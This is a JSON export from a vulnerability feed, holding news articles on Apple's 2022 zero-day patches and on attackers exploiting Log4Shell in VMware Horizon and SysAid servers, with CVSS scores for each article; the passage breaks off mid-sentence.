"cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675"], "modified": "2022-04-01T02:54:05", "id": "THN:B7C3E2FB36F3AC7424BD3AE9F877CF3C", "href": "https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T08:22:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBAbKGPJ0333Ymy0pNRh1c2YnrPqm6TS2UIjUjovslcTAhZDG3ZiJL2NUGwYskLCWmfGgOrY2C7Oc4f0mSnUJpQx8uiCxQx1F8ThJNkKWy0mvxkKZyYnL5JSm5bgrDyPNaikwN2eUSslZnjTx6WxpApYeSvWf5SyIsbvk-dvrtzyNCGFSdpQF6zVtW/s728-e100/apple-software-update.jpg>)\n\nApple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.\n\nThe issue, assigned the identifier **CVE-2022-32917**, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.\n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the iPhone maker acknowledged in a brief statement, adding it resolved the bug with improved bound checks.\n\nAn anonymous researcher has been credited with reporting the shortcoming. It's worth noting that CVE-2022-32917 is also the [second Kernel related zero-day flaw](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) that Apple has remediated in less than a month.\n\nPatches are available in versions [iOS 15.7, iPadOS 15.7](<https://support.apple.com/en-us/HT213445>), [iOS 16](<https://support.apple.com/en-us/HT213446>), [macOS Big Sur 11.7](<https://support.apple.com/en-us/HT213443>), and [macOS Monterey 12.6](<https://support.apple.com/en-us/HT213444>). 
The iOS and iPadOS updates cover iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\nWith the latest fixes, Apple has addressed seven actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22594**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (WebKit Storage) \u2013 A website may be able to track sensitive user information (publicly known but not actively exploited) \n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32893**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-32894**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nBesides CVE-2022-32917, Apple has plugged 10 security holes in iOS 16, spanning Contacts, Kernel Maps, MediaLibrary, Safari, and WebKit. 
The iOS 16 update is also notable for incorporating a new [Lockdown Mode](<https://thehackernews.com/2022/07/apples-new-lockdown-mode-protects.html>) that's designed to make zero-click attacks harder.\n\niOS further introduces a feature called [Rapid Security Response](<https://thehackernews.com/2022/06/apples-new-feature-will-install.html>) that makes it possible for users to automatically install security fixes on iOS devices without a full operating system update.\n\n\"Rapid Security Responses deliver important security improvements more quickly, before they become part of other improvements in a future software update,\" Apple said in a [revised support document](<https://support.apple.com/en-us/HT204204>) published on Monday.\n\nLastly, iOS 16 also brings support for [passkeys](<https://thehackernews.com/2022/05/google-to-add-passwordless.html>) in the Safari web browser, a passwordless sign-in mechanism that allows users to log in to websites and services by authenticating via Touch ID or Face ID.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T03:36:00", "type": "thn", "title": "Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917"], "modified": "2022-09-14T04:13:45", "id": "THN:A60A19BF44B2CA75E63F31234992BE54", "href": "https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-28T08:06:13", "description": 
"Tech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild.\n\nThe weakness, given the identifier [CVE-2022-42827](<https://support.apple.com/en-us/HT213489>), has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges.\n\nSuccessful exploitation of [out-of-bounds write](<https://cwe.mitre.org/data/definitions/787.html>) flaws, which typically occur when a program attempts to write data to a memory location that's outside of the bounds of what it is allowed to access, can result in corruption of data, a crash, or execution of unauthorized code.\n\nThe iPhone maker said it addressed the bug with improved bounds checking, while crediting an anonymous researcher for reporting the vulnerability.\n\nAs is usually the case with actively exploited zero-day flaws, Apple refrained from sharing more specifics about the shortcoming other than acknowledging that it's \"aware of a report that this issue may have been actively exploited.\"\n\nCVE-2022-42827 is the third consecutive Kernel-related out-of-bounds memory vulnerability to be patched by Apple after [CVE-2022-32894](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) and [CVE-2022-32917](<https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html>), the latter two of which have also been previously reported to be weaponized in real-world attacks.\n\nThe security update is available for iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th 
generation and later.\n\nWith the latest fix, Apple has closed out eight actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22594**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (WebKit Storage) \u2013 A website may be able to track sensitive user information (publicly known but not actively exploited)\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32893**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-32894**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32917**](<https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nAside from CVE-2022-42827, the update also addresses 19 other security vulnerabilities, including two in Kernel, three in Point-to-Point Protocol (PPP), two in WebKit, and one each in 
AppleMobileFileIntegrity, Core Bluetooth, IOKit, Sandbox, and more.\n\n**_Update:_** Apple on Thursday backported fixes for the actively exploited iOS zero-day flaw (CVE-2022-42827) to older devices as part of [iOS and iPadOS 15.7.1](<https://support.apple.com/en-us/HT213490>) updates, along with patches for 17 other vulnerabilities.\n\nThe list of impacted devices consists of iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\nThe tech giant also [revised the advisory](<https://support.apple.com/en-us/HT213489>) it issued earlier this week for iOS 16.1 and iPadOS 16 to include 15 more new flaws, including four issues in the Kernel and others in Apple Neural Engine, FaceTime, Graphics Driver, and zlib, taking the total number of fixes to 36.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T03:35:00", "type": "thn", "title": "Apple Releases Patch for New Actively Exploited iOS and iPadOS Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917", "CVE-2022-42827"], "modified": "2022-10-28T07:13:48", "id": "THN:4B97BCD00CAE89549A57EBFAECA484AE", "href": "https://thehackernews.com/2022/10/apple-releases-patch-for-new-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-21T07:57:18", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYhs0ipenD0AoL9V_aDGu9Ne59wQB4dVjm765OFf3mrjKTBnTs1wKWI7wEhojmYN1I7kb8uwSBREekjYU8iT0Vwm5Hyt1OKmgy_fleoHryLao0e7ASyt3c-RFQZr0hQPO7IMPscn9-BZbr_-cYqs7nuTB5CSFjV0CmokCbPxE6hFiOt5lshyEgS6bP/s728-e100/Google%20Researchers%20Detail%205-Year-Old%20Apple%20Safari%20Vulnerability%20Exploited%20in%20the%20Wild.jpg>)\n\nA security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.\n\nThe issue, tracked as [CVE-2022-22620](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to gain arbitrary code execution.\n\nIn early February 2022, Apple shipped patches for the bug across Safari, iOS, iPadOS, and macOS, while acknowledging that it \"may have been actively exploited.\"\n\n\"In this case, the variant was completely patched when the vulnerability was initially reported in 2013,\" Maddie Stone of Google Project Zero 
[said](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>). \"However, the variant was reintroduced three years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild zero-day in January 2022.\"\n\nWhile both the [2013](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>) and [2022](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>) bugs in the [History API](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) are essentially the same, the paths to trigger the vulnerability are different. Code changes made years after the original fix revived the flaw from the dead like a \"zombie.\"\n\nNoting that the incident is not unique to Safari, Stone stressed the need to take adequate time to audit code and patches, both to avoid fixing the same bug twice and to understand the security impact of the changes being made, particularly where object lifetimes are involved.\n\n\"Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions,\" Stone noted.\n\n\"It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they're related to lifetime semantics.\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-20T10:10:00", "type": "thn", "title": "Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-06-21T06:18:58", "id": "THN:9A9EADE3A5D4449C9E0519E22A93B306", "href": "https://thehackernews.com/2022/06/google-researchers-detail-5-year-old.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-14T04:09:16", "description": "Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, 
and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.\n\nTracked as **CVE-2022-42856**, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to arbitrary code execution.\n\nThe company said it's \"aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.\"\n\nWhile details surrounding the exact nature of the attacks are unknown as yet, they likely involved social engineering or a watering hole, infecting devices when the victim visited a rogue or legitimate-but-compromised domain via the browser.\n\nIt's worth noting that every third-party web browser available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, is [required](<https://www.macrumors.com/2022/02/25/should-apple-ban-rival-browser-engines/>) to use the WebKit rendering engine due to restrictions imposed by Apple, so switching browsers does not sidestep a WebKit bug.\n\nCredited with discovering and reporting the issue is Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG). Apple noted it addressed the bug with improved state handling.\n\nThe update, which is available with [iOS 15.7.2, iPadOS 15.7.2](<https://support.apple.com/en-us/HT213531>), [macOS Ventura 13.1](<https://support.apple.com/en-us/HT213532>), [tvOS 16.2](<https://support.apple.com/en-us/HT213535>), and [Safari 16.2](<https://support.apple.com/en-us/HT213537>), arrives two weeks after Apple patched the same bug in [iOS 16.1.2](<https://support.apple.com/en-us/HT213516>) on November 30, 2022.\n\nThe fix marks the resolution of the tenth zero-day vulnerability discovered in Apple software since the start of the year. 
It's also the ninth actively exploited zero-day flaw in 2022 -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22594**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (WebKit Storage) \u2013 A website may be able to track sensitive user information (publicly known but not actively exploited)\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32893**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-32894**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32917**](<https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-42827**](<https://thehackernews.com/2022/10/apple-releases-patch-for-new-actively.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nThe latest [iOS, iPadOS](<https://support.apple.com/en-us/HT213530>), and 
[macOS](<https://support.apple.com/en-us/HT213532>) updates also introduce a new security feature called [Advanced Data Protection for iCloud](<https://thehackernews.com/2022/12/apple-boosts-security-with-new-imessage.html>) that expands end-to-end encryption (E2EE) to iCloud Backup, Notes, Photos, and more.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-14T03:44:00", "type": "thn", "title": "New Actively Exploited Zero-Day Vulnerability Discovered in Apple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917", "CVE-2022-42827", "CVE-2022-42856"], "modified": "2022-12-14T04:00:30", "id": "THN:EC350D7E2CF02EC9CB76AA85E0D3F47A", "href": "https://thehackernews.com/2022/12/new-actively-exploited-zero-day.html", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-25T04:06:05", "description": "Apple on Wednesday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213412>), and [macOS](<https://support.apple.com/en-us/HT213413>) platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.\n\nThe list of issues is below -\n\n * **CVE-2022-32893** \\- An out-of-bounds write issue in WebKit which could lead to the execution of arbitrary code by processing specially crafted web content\n * **CVE-2022-32894** \\- An out-of-bounds write issue in the operating system's Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges\n\nApple said it addressed both issues with improved bounds checking, adding it's aware the vulnerabilities \"may have been actively exploited.\"\n\nThe company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it's likely that they were abused as part of highly targeted intrusions. A WebKit code-execution bug chained with a kernel bug is the usual shape of a full browser-to-device compromise: the first gives the attacker code inside the renderer sandbox, the second escapes it.\n\nThe latest update brings the total number of actively exploited zero-days patched by Apple to six since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * 
[**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nBoth vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n**_Update:_** Apple on Thursday released a [security update](<https://support.apple.com/en-us/HT213414>) for the Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-18T03:08:00", "type": "thn", "title": "Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894"], "modified": "2022-10-25T03:24:38", "id": "THN:DEAEC76D89D5583101E2E6036C289609", "href": "https://thehackernews.com/2022/08/apple-releases-security-updates-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "The digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched [VMware Horizon](<https://www.vmware.com/products/horizon.html>) servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.\n\n\"The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure,\" the non-departmental public body [said](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>) in an alert. 
\"Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.\"\n\nThe web shell, once deployed, can serve as a conduit for a range of post-exploitation activity such as deploying additional malware, exfiltrating data, or dropping ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.\n\n[Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical remote code execution flaw in Apache Log4j 2, a ubiquitous open-source logging framework, which has been put to use as part of [different malware campaigns](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) since it came to light in December 2021. An array of hacking groups, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to date.\n\nThe development also marks the second time VMware products have come under exploitation stemming from vulnerabilities in the Log4j library.\n\n
Last month, AdvIntel researchers [disclosed](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) that attackers were targeting systems running VMware vCenter servers with the aim of installing Conti ransomware.\n\nVMware, for its part, [released security updates](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) last month for Horizon, vCenter, and other products impacted by Log4Shell. The virtualization provider acknowledged scanning attempts in the wild and urged customers to install the patches where applicable, or to apply the published workarounds in the meantime.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T07:04:00", "type": "thn", "title": "NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T07:04:51", "id": "THN:833B2B9623F1C64D20868B947E8BE4E0", "href": "https://thehackernews.com/2022/01/nhs-warns-of-hackers-targeting-log4j.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-27T04:02:40", "description": "Iranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability's [long tail](<https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html>) for remediation.\n\nMicrosoft attributed the latest set of activities to the [umbrella threat group](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) tracked as [MuddyWater](<https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html>) (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is [linked](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) to the Iranian intelligence apparatus, the Ministry of Intelligence and Security (MOIS).\n\nThe attacks are notable for using SysAid Server instances unsecured against the [Log4Shell flaw](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) as a vector for initial access, [marking](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) a [departure](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>) from the actors' pattern of leveraging VMware applications for breaching target environments.\n\n\"After gaining access, Mercury establishes persistence, dumps credentials, and moves laterally within the 
targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack,\" Microsoft [said](<https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/>).\n\nThe tech giant's threat intelligence team said it observed the attacks between July 23 and 25, 2022.\n\nA successful compromise is said to have been followed by the deployment of web shells to execute commands that permit the actor to conduct reconnaissance, establish persistence, steal credentials, and facilitate lateral movement.\n\nAlso employed for command-and-control (C2) communication during the intrusions were a remote monitoring and management tool called [eHorus](<https://ehorus.com/>) and Ligolo, a [reverse-tunneling tool](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) of choice for the adversary.\n\nThe findings come as the U.S. 
